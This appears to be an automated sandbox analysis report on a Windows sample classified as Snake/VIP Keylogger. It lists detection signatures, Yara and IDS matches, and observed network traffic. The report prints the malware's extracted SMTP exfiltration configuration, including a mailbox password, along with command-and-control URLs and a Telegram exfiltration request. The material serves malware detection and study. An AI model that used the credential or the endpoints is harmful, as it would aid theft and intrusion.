
Windows Analysis Report
z1PO7311145.exe

Overview

General Information

Sample name: z1PO7311145.exe
Analysis ID: 1528088
MD5: b9a13749cc0659a2076afca8f7474509
SHA1: 4cb32e56f1333ee8eb523c442d597bad0faf49b7
SHA256: c8f7435398a1f1de11e2b2385b2bfd92414860fe7394071ba329ad0ee1c22a48
Tags: exe, user-Porcupine

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z1PO7311145.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\z1PO7311145.exe" MD5: B9A13749CC0659A2076AFCA8F7474509)
  • cleanup
Malware family (Malpedia):
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
Yara matches on the submitted sample
Source | Rule | Description | Author
z1PO7311145.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
z1PO7311145.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
z1PO7311145.exe | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
z1PO7311145.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
z1PO7311145.exe | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings:
  • 0x2df5b:$a1: get_encryptedPassword
  • 0x2e278:$a2: get_encryptedUsername
  • 0x2dd6b:$a3: get_timePasswordChanged
  • 0x2de74:$a4: get_passwordField
  • 0x2df71:$a5: set_encryptedPassword
  • 0x2f652:$a7: get_logins
  • 0x2f5b5:$a10: KeyLoggerEventArgs
  • 0x2f21a:$a11: KeyLoggerEventArgsEventHandler

Yara matches on process memory dumps
Source | Rule | Description | Author
00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Yara matches on unpacked PE files
Source | Rule | Description | Author
0.0.z1PO7311145.exe.b30000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.0.z1PO7311145.exe.b30000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.z1PO7311145.exe.b30000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0.0.z1PO7311145.exe.b30000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0.0.z1PO7311145.exe.b30000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Matched strings: the same eight offsets ($a1, $a2, $a3, $a4, $a5, $a7, $a10, $a11) as listed for the submitted sample above.

                            System Summary

Sigma rule match
Source: Network Connection | Author: frack113 | Data: DestinationIp: 192.250.231.25, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\z1PO7311145.exe, Initiated: true, ProcessId: 6492, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49770

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T15:32:12.024708+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 188.114.97.3 | 443 | TCP
2024-10-07T15:32:15.878264+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49707 | 188.114.97.3 | 443 | TCP
2024-10-07T15:32:17.084831+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-07T15:32:18.238750+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49711 | 188.114.97.3 | 443 | TCP
2024-10-07T15:32:19.662001+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49713 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T15:32:10.619499+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 158.101.44.242 | 80 | TCP
2024-10-07T15:32:11.463421+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 158.101.44.242 | 80 | TCP
2024-10-07T15:32:12.635105+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49702 | 158.101.44.242 | 80 | TCP
2024-10-07T15:32:13.791372+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49704 | 158.101.44.242 | 80 | TCP
2024-10-07T15:32:14.947634+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49706 | 158.101.44.242 | 80 | TCP


                            AV Detection

Source: z1PO7311145.exe | Avira: detected
Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: 0.0.z1PO7311145.exe.b30000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
Source: z1PO7311145.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: z1PO7311145.exe | Joe Sandbox ML: detected

                            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: z1PO7311145.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: z1PO7311145.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 02DAF45Dh | 0_2_02DAF2C0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 02DAF45Dh | 0_2_02DAF4AC
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 02DAF45Dh | 0_2_02DAF52F
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 02DAFC19h | 0_2_02DAF961
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3E0A9h | 0_2_06B3DE00
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B331E0h | 0_2_06B32DC8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B30D0Dh | 0_2_06B30B30
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B31697h | 0_2_06B30B30
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B32C19h | 0_2_06B32968
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3E959h | 0_2_06B3E6B0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3F209h | 0_2_06B3EF60
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3CF49h | 0_2_06B3CCA0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B331E0h | 0_2_06B32DC2
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3D7F9h | 0_2_06B3D550
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3E501h | 0_2_06B3E258
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3F661h | 0_2_06B3F3B8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3EDB1h | 0_2_06B3EB08
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3D3A1h | 0_2_06B3D0F8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3FAB9h | 0_2_06B3F810
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 0_2_06B30040
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B3DC51h | 0_2_06B3D9A8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 4x nop then jmp 06B331E0h | 0_2_06B3310E

                            Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: z1PO7311145.exe, type: SAMPLE
Source: Yara match | File source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CNSV-LLCUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49706 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49704 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.electradubai.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 07 Oct 2024 13:32:23 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: z1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: z1PO7311145.exe | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: z1PO7311145.exe | String found in binary or memory: http://aborters.duckdns.org:8081
Source: z1PO7311145.exe | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: z1PO7311145.exe | String found in binary or memory: http://checkip.dyndns.org/q
Source: z1PO7311145.exe, 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.electradubai.com
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z1PO7311145.exe | String found in binary or memory: http://varders.kozow.com:8081
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: z1PO7311145.exe | String found in binary or memory: https://api.telegram.org/bot
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003055000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003050000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enxK
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: z1PO7311145.exe | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003086000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003081000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/xK
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2

                            System Summary

Source: z1PO7311145.exe, type: SAMPLE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: z1PO7311145.exe, type: SAMPLE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: z1PO7311145.exe, type: SAMPLE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\z1PO7311145.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAD278
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA5362
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAA088
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAC148
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA7118
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAC738
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAC468
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DACA08
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAE988
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA69B0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DACFAA
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DACCD8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA3AA1
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA29EC
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA39ED
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAE97A
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DAF961
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_02DA3E09
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B31E80
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3DE00
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B317A0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B39C70
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3FC68
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B39548
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B30B30
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B35028
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B32968
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3E6B0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3E6A0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B31E70
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3178F
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3EF60
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3EF51
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3CCA0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3FC5E
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3DDFF
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3D550
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3D540
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3EAF8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3E258
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3E24A
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3F3B8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B38BA0
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B38B96
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B39BFA
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B30B20
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B39328
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3EB08
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3D0F8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3D0E9
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B35022
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3F810
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3F802
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B30006
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B30040
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3D9A8
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3D999
Source: C:\Users\user\Desktop\z1PO7311145.exe | Code function: 0_2_06B3295A
Source: z1PO7311145.exe, 00000000.00000002.3694144020.000000000109E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs z1PO7311145.exe
Source: z1PO7311145.exe, 00000000.00000002.3693772784.0000000000F37000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z1PO7311145.exe
Source: z1PO7311145.exe, 00000000.00000000.1238289372.0000000000B76000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs z1PO7311145.exe
Source: z1PO7311145.exe | Binary or memory string: OriginalFilenameRemington.exe4 vs z1PO7311145.exe
Source: z1PO7311145.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: z1PO7311145.exe, type: SAMPLE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: z1PO7311145.exe, type: SAMPLE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: z1PO7311145.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
